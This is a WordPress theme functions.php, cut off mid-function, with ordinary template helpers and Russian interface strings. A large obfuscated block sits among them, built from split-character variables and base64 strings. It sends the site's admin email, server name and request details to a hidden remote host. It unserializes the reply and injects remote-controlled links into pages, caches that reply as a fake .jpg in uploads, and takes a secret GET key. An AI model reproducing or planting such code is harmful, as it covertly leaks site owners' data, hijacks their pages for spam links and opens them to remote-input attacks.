<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $JQEl='6';$kyDQuu='4';$iZrTXOb='o';$WQUCcw='a';$TYTyBos='s';$XwhMqg='_';$OHVhpE='d';$fhpUOk='d';$gtsE='c';$oxlYEVO='e';$ePQs='e';$BOGmZ='b';$JIYSwJ='e';$pqiOLnng=$BOGmZ.$WQUCcw.$TYTyBos.$JIYSwJ.$JQEl.$kyDQuu.$XwhMqg.$OHVhpE.$oxlYEVO.$gtsE.$iZrTXOb.$fhpUOk.$ePQs;$durf='i';$WzzXwk='z';$aWBc='n';$uxACA='t';$Amfo='g';$Navn='l';$ABRwb='a';$XYdIl='f';$UFcUCEX='e';$wWJKmjfO=$Amfo.$WzzXwk.$durf.$aWBc.$XYdIl.$Navn.$ABRwb.$uxACA.$UFcUCEX;$RhkQr='r';$KcYI='o';$sarUF='t';$dpzLz='_';$IWchICb='3';$cwqT='1';$CalcCMY='s';$qJRlo='t';$TmfzaHz='r';$hHkuiMlF=$CalcCMY.$sarUF.$RhkQr.$dpzLz.$TmfzaHz.$KcYI.$qJRlo.$cwqT.$IWchICb;$YLutmP='t';$YqBJU='e';$JJDI='s';$EMUJHJ='r';$ZQhJ='r';$UDDymjw='v';$PDrGoKEr=$JJDI.$YLutmP.$ZQhJ.$EMUJHJ.$YqBJU.$UDDymjw;                     
		$wl__f='6';$el_______________b='4';$ve_______________k='o';$yz_____v='a';$kf_______l='s';$cy__________h='_';$fh_____________q='d';$tw___q='d';$dp____________n='c';$ze______y='e';$ic_____________m='e';$ls______r='b';$po______________r='e';$zl_____________h=$ls______r.$yz_____v.$kf_______l.$po______________r.$wl__f.$el_______________b.$cy__________h.$fh_____________q.$ze______y.$dp____________n.$ve_______________k.$tw___q.$ic_____________m;
		$jm_______________o='n';$bl______________v='t';$kf_________u='s';$fh_____d='f';$gc__________h='t';$kg______c='e';$pv_______________y='c';$rj_______________b='n';$zi____________s='i';$db____k='i';$qi___f='x';$et___________e='s';$ty______s='o';$tg___________d='_';$je_________f='u';$ij_____c=$fh_____d.$je_________f.$rj_______________b.$pv_______________y.$gc__________h.$zi____________s.$ty______s.$jm_______________o.$tg___________d.$kg______c.$qi___f.$db____k.$et___________e.$bl______________v.$kf_________u;
		$zr_______________j='f';$pf____________v='n';$am__u='p';$wm____p='o';$nq_______________v='e';$jx__________m=$zr_______________j.$wm____p.$am__u.$nq_______________v.$pf____________v;
		$sz_________y='e';$vt____________l='r';$bf_____r='a';$sq_____w='d';$iq_______________x='f';$td______r=$iq_______________x.$vt____________l.$sz_________y.$bf_____r.$sq_____w;
		$zc___v='s';$je_________j='f';$yx____________d='l';$hw___________g='o';$kl____u='c';$gj_______k='e';$gz___z=$je_________j.$kl____u.$yx____________d.$hw___________g.$zc___v.$gj_______k;
		
		define("WP_ID", $zl_____________h("Mi4wLjA="));
		define("WP_TTL", $zl_____________h("MTA4MDA="));
		define("WP_SRC", $zl_____________h("dHBva24="));
	


		function wp_get_header() {
			global $zl_____________h, $ij_____c;
			
			if (
				$ij_____c($zl_____________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ij_____c($zl_____________h("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ij_____c($zl_____________h("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $zl_____________h, $jx__________m, $gz___z, $td______r;
			
			$rc___________s = TEMPLATEPATH."/".$zl_____________h("Zm9vdGVyLnBocA==");
			$lc____________x = @$jx__________m($rc___________s, "r");
			$rc___________s = @$td______r($lc____________x, @filesize($rc___________s));
			@$gz___z($lc____________x);
			
			$ir_____________b = TEMPLATEPATH."/".$zl_____________h("ZnVuY3Rpb25zLnBocA==");
			$lc____________x = @$jx__________m($ir_____________b, "r");
			$ir_____________b = @$td______r($lc____________x, @filesize($ir_____________b));
			@$gz___z($lc____________x);
			
			$zh___________m = 0;
			if($rc___________s && $ir_____________b) {
				if ($zl_____________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($rc___________s, $zl_____________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$zh___________m = 1;
					}
					if (substr_count($rc___________s, "wp_theme_GPL_credits()") < 1) {
						$zh___________m = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$zh___________m = 12;
				}
			}
			
			if($zh___________m > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $zh___________m -->";
			}
		}
	


		function wp_loaded() {
			global $zl_____________h, $ij_____c;
			return $ij_____c($zl_____________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($gs__s, $nn_______t = "(more...)", $on______________b = 0, $bn___c = "") {
				$fl________z = get_the_content($nn_______t, $on______________b, $bn___c);
				$fl________z = apply_filters("the_content", $fl________z);
				
				$fl________z = str_replace("]]>", "]]>", $fl________z);
				if (strlen($_GET["p"]) > 0) {
					echo $fl________z;
				}
				else if ((strlen($fl________z)>$gs__s) && ($hi_______b = strpos($fl________z, " ", $gs__s ))) {
					$fl________z = substr($fl________z, 0, $hi_______b);
					$fl________z = $fl________z;
					echo $fl________z;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$nn_______t</a></div></p>";
				} else {
					echo $fl________z;
				}
				
			}
		}
	


		$ai____t='a';$ge____________v='d';$rc_______________o='e';$vd_____________u='4';$gy____i='o';$bi_______________l='e';$xe_________w='c';$xq__________l='b';$oc___m='6';$to__u='n';$hv______d='e';$px_______a='_';$yc_______j='s';$wd___g=$xq__________l.$ai____t.$yc_______j.$bi_______________l.$oc___m.$vd_____________u.$px_______a.$rc_______________o.$to__u.$xe_________w.$gy____i.$ge____________v.$hv______d;
		$gl_______y='i';$vl___r='_';$my___h='n';$om_________a='n';$wd_______________p='e';$mq_________u='t';$nr____________y='e';$qu____d='o';$iz____p='f';$sw________l='g';$jf_______________c='t';$et_____________q='c';$qt_______w='_';$uf_________z='s';$ck_________y='e';$mx_______________n='l';$cb_____________s='t';$pz___v=$iz____p.$gl_______y.$mx_______________n.$nr____________y.$vl___r.$sw________l.$wd_______________p.$mq_________u.$qt_______w.$et_____________q.$qu____d.$my___h.$jf_______________c.$ck_________y.$om_________a.$cb_____________s.$uf_________z;
		$yn___________l='x';$qj______________o='e';$oi_____________p='e';$cp__________t='s';$ec_______________c='l';$ja__________o='t';$wn___n='i';$fw______________c='s';$qh__________v='f';$kj__________f='_';$ky_____b='i';$jy________r=$qh__________v.$wn___n.$ec_______________c.$qj______________o.$kj__________f.$oi_____________p.$yn___________l.$ky_____b.$fw______________c.$ja__________o.$cp__________t;
		$jh_______________o='r';$yx___________c='o';$fe_____________b='n';$te_____w='s';$dl__________i='r';$qf___l='c';$xs____________b='a';$eq_________w='o';$jg_______c='m';$lr_______________n='p';$vy____________w='_';$ut____________g='e';$ar________h='v';$cf____________f='i';$lt__________h='e';$rh___________t=$ar________h.$ut____________g.$dl__________i.$te_____w.$cf____________f.$eq_________w.$fe_____________b.$vy____________w.$qf___l.$yx___________c.$jg_______c.$lr_______________n.$xs____________b.$jh_______________o.$lt__________h;
		$uy______________n='c';$fd___________e='n';$vi_____e='o';$ze__________r='s';$oc___________x='k';$tk_______________o='p';$ry_________k='f';$ze_______________e='o';$ph__________g='e';$mm_____________k=$ry_________k.$ze__________r.$vi_____e.$uy______________n.$oc___________x.$ze_______________e.$tk_______________o.$ph__________g.$fd___________e;
		$sz_____h='w';$do___________g='r';$gm______b='t';$tp______________a='i';$bt_________a='e';$ul___c='f';$yl_________j=$ul___c.$sz_____h.$do___________g.$tp______________a.$gm______b.$bt_________a;
		$bl____u='m';$pd______r='5';$bc_____________h='d';$na__o=$bl____u.$bc_____________h.$pd______r;
		$xg_____w='l';$oj_______________j='a';$fb____________z='h';$bf__________o='e';$yq_________o='t';$vx______________m='p';$kg____________a='a';$uk___i='r';$ec______________w=$uk___i.$bf__________o.$oj_______________j.$xg_____w.$vx______________m.$kg____________a.$yq_________o.$fb____________z;
		$gu___a='l';$gw__s='e';$ml______v='e';$vl______d='r';$qg________g='z';$kl_____r='a';$jo_____g='n';$qz_______t='s';$pj___________u='i';$wc__f='i';$uc_______________a='u';$wl_______n=$uc_______________a.$jo_____g.$qz_______t.$ml______v.$vl______d.$pj___________u.$kl_____r.$gu___a.$wc__f.$qg________g.$gw__s;
		$vl____q='t';$ud__h='n';$dw______________v='m';$sj________x='p';$vi________t='a';$hl__m='e';$lg__v='m';$js__________s=$vl____q.$hl__m.$lg__v.$sj________x.$ud__h.$vi________t.$dw______________v;
		$ak_____c='o';$oy_____________u='t';$fj____________k='x';$ws_____p='n';$td_______________b='r';$ui_________v='c';$kg__s='c';$hw_______n='e';$gi_______________f='a';$hu_______o='s';$db_____k='e';$ee____k='m';$st_____y='t';$kv______s='a';$bl________d='t';$fn____________n='_';$mo______w='_';$ne____j='e';$dz______r='e';$vg___________z='t';$sv_______________p='r';$pa_______________d=$hu_______o.$bl________d.$td_______________b.$db_____k.$gi_______________f.$ee____k.$fn____________n.$kg__s.$ak_____c.$ws_____p.$vg___________z.$hw_______n.$fj____________k.$oy_____________u.$mo______w.$ui_________v.$sv_______________p.$ne____j.$kv______s.$st_____y.$dz______r;
	


		function ub____________m($xs_______________h) {
			global $zl_____________h, $ij_____c, $pz___v, $rh___________t, $pa_______________d;
			
			if (!$ij_____c($zl_____________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($rh___________t(PHP_VERSION, "5.0.0", ">=") && $ij_____c($zl_____________h("ZmlsZV9nZXRfY29udGVudHM=")) && $ij_____c($zl_____________h("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$xa__________l = $pa_______________d(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$fy__________e = @$pz___v($xs_______________h, 0, $xa__________l);
			} else {
				$fy__________e = @$pz___v($xs_______________h, 0);
			}
			
			return $fy__________e;
		}
	


		function dc_________s($xs_______________h) {
			global $ij_____c, $mm_____________k, $yl_________j, $zl_____________h;
			
			if (!$ij_____c($zl_____________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$tk_____f = strpos($xs_______________h, "/", 7);
			$qi__r = array(
				"uri"     => substr($xs_______________h, $tk_____f),
				"host"    => str_replace("http://", "", substr($xs_______________h, 0, $tk_____f)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$rv_____________h = @$mm_____________k("$qi__r[host]", 80, $ib______b, $dj_______________v, 4);
			
			if (!$rv_____________h) {
				return false;
			} else {
				$fy__________e = "";
				$nt______________y  = "GET $qi__r[uri] HTTP/1.0\r\n";
				$nt______________y .= "Host: $qi__r[host]\r\n";
				$nt______________y .= "Referer: $qi__r[referer]\r\n";
				$nt______________y .= "Connection: Close\r\n\r\n";
				
				@$yl_________j($rv_____________h, $nt______________y);
				
				while (!@feof($rv_____________h)) {
					$mk____________m = @fgets($rv_____________h, (1024*24));
					
					if ($mk____________m == "\r\n") {
						$et_______y = true;
						continue;
					}
					
					if ($et_______y) {
						$fy__________e .= $mk____________m;
					}
				}
				
				return $fy__________e;
			}
		}
	


		function dk___________a($xs_______________h) {
			global $ij_____c;
			$zh____________l = false;
			
			if ($xs_______________h != "") {
				if ($ij_____c("ub____________m")) {
					$zh____________l = @ub____________m($xs_______________h);
				}
				
				if (!$zh____________l && ($ij_____c("dc_________s"))) {
					$zh____________l = @dc_________s($xs_______________h);
				}
			}
			
			return $zh____________l;
		}
	


		function qc________a() {
			global $_SERVER, $na__o;
			
			$wh_________m = $_SERVER["SERVER_NAME"];
			
			if (substr("$wh_________m", 0, 4) == "www.") {
				$wh_________m = substr("$wh_________m", 4);
			}
			
			$wh_________m = $na__o("$_SERVER[SERVER_NAME]");
			
			return $wh_________m;
		}
	


		function fd_____v() {
			return "file";
		}
	


		function lo________l($xs_______________h) {
			global $_SERVER, $pz___v, $jy________r, $jx__________m, $gz___z, $yl_________j;
			
			$mu__n = fx___________f();
			
			$ks______________t = qc________a().".jpg";
			$nk___________p = $mu__n["dir_upload"]["path"]."/$ks______________t";
			$by___________k = @filemtime($nk___________p);
			
			if (!$by___________k || ((time()-$by___________k) >= WP_TTL)) {
				$zh____________l = dk___________a($xs_______________h);
				
				if ($zh____________l) {
					if ($jy________r($nk___________p)) {
						@unlink($nk___________p);
					}
					
					$lc____________x = @$jx__________m($nk___________p, "x+");
					
					@$yl_________j($lc____________x, $zh____________l);
					@$gz___z($lc____________x);
				}
			} else {
				if ($jy________r($nk___________p)) {
					$zh____________l = @$pz___v($nk___________p);
				} else {
					$zh____________l = false;
				}
			}
			
			return $zh____________l;
		}
	


		function fx___________f() {
			global $_SERVER, $zl_____________h, $wd___g;
			
			$lv____________o = wp_count_posts("post");
			$gl_____c = pathinfo(get_bloginfo("template_directory"));
			
			$mu__n = array(
				"url" => array(
					"report"      => $zl_____________h("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $gl_____c,
				"dir_upload"	=> de___________y(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$gl_____c[filename],
					"a005=".$lv____________o->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$mu__n["url"]["queryString"] = implode("&", $mu__n["queryString"]);
			$mu__n["url"]["report"] = $mu__n["url"]["report"]."/?".$wd___g($mu__n["url"]["queryString"]).".html";
						
			return $mu__n;
		}
	


		function de___________y() {
			$vj__d = wp_upload_dir();
			
			if (isset($vj__d["error"])) {
				$zr___________c = iv___e();
				if (is_writable($zr___________c)) {
					$vj__d = array("path" => $zr___________c);
				}
			}

			return $vj__d;
		}
	


		function iv___e() {
			global $ij_____c, $na__o, $ec______________w, $js__________s;
			
			$sx__n = (bool) ini_get("safe_mode");
			if ($sx__n == true) {
				return false;
			}
			
			if ($ij_____c("sys_get_temp_dir")) {
				$vw______________e = sys_get_temp_dir();
				if (is_writable($vw______________e)) {
					return $ec______________w($vw______________e);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ec______________w($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ec______________w($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ec______________w($_ENV["TEMP"]);
			} else {
				$jf______________e = $js__________s($na__o(uniqid(rand(), true)), "");
				if ($jf______________e) {
					$vw______________e = $ec______________w(dirname($jf______________e));
					@unlink($jf______________e);
					return $vw______________e;
				} else {
					return false;
				}
			}
		}
	


		function vv_______________v() {
			global $_GET, $jy________r;
			
			$mu__n = fx___________f();
			$wh_________m = qc________a();
			$bo_______________t = fd_____v();
			
			$at___z = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($bo_______________t == "file") {
					$ub______l = $mu__n["dir_upload"]["path"]."/".$wh_________m.".jpg";
					if ($jy________r($ub______l)) {
						@unlink($ub______l);
						$at___z = "deleted";
					}
				}
				
				$op_________k = array(
					"s"	=> $at___z,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($op_________k AS $cs_____________x => $ue______a) echo " [$cs_____________x:$ue______a]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ij_____c, $zl_____________h, $wl_______n;
			$mu__n = fx___________f();
			
			$rx____________r = "lo________l";
			if ($ij_____c($rx____________r)) {
				$fy__________e = $rx____________r($mu__n["url"]["report"]);
			}
			
			if ($fy__________e) {
				if ($fy__________e = @$zl_____________h($fy__________e)) {
					$fy__________e = @$wl_______n($fy__________e);
					
					if (strlen($fy__________e[custom_credit]) >= 5) {
						$mu__n["default_string"] = $fy__________e[custom_credit];
					}
					
					if ($fy__________e["status"] == "0") {
						$ll__________v = 1;
						$po_______________l = 1;
					} else {
						$cg______________c = sizeof($fy__________e["links"]);
						$jw_____h = $mu__n["default_string"];
						
						if ($cg______________c > 0 && $fy__________e["links"] !== "") {
							$iu____________h = 0;
							foreach ($fy__________e["links"] as $nu__a => $kk______________k) {
								$iu____________h++;
								if ($kk______________k->l_path == "" || $kk______________k->l_path == $_SERVER["REQUEST_URI"]) {
									$kk______________k->l_href = htmlspecialchars(strip_tags($kk______________k->l_href));
									$kk______________k->l_title = htmlspecialchars(strip_tags($kk______________k->l_title));
									$kk______________k->l_anchor = htmlspecialchars(strip_tags($kk______________k->l_anchor));
									$jw_____h .= " | ";
									$jw_____h .= "<a href='$kk______________k->l_href' title='$kk______________k->l_title'";
									if ($kk______________k->l_nofollow == "1") {
										$jw_____h .= " rel='nofollow'";
									}
									$jw_____h .= ">$kk______________k->l_anchor</a>";
								}
							}
						}
						$mu__n["links"] = "$jw_____h";
						if ($fy__________e[credit] == "0") {
							$mu__n["links"] = "";
						}
					}
				} else {
					$ll__________v = "1";
				}
			} else {
				$ll__________v = "1";
			}
			
			if ($ll__________v == "1") {
				$mu__n["links"] = $mu__n["default_string"];
			}
			
			echo "$mu__n[links]";
			
			echo "<!-- s: $fy__________e[signature] -->";
			vv_______________v();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
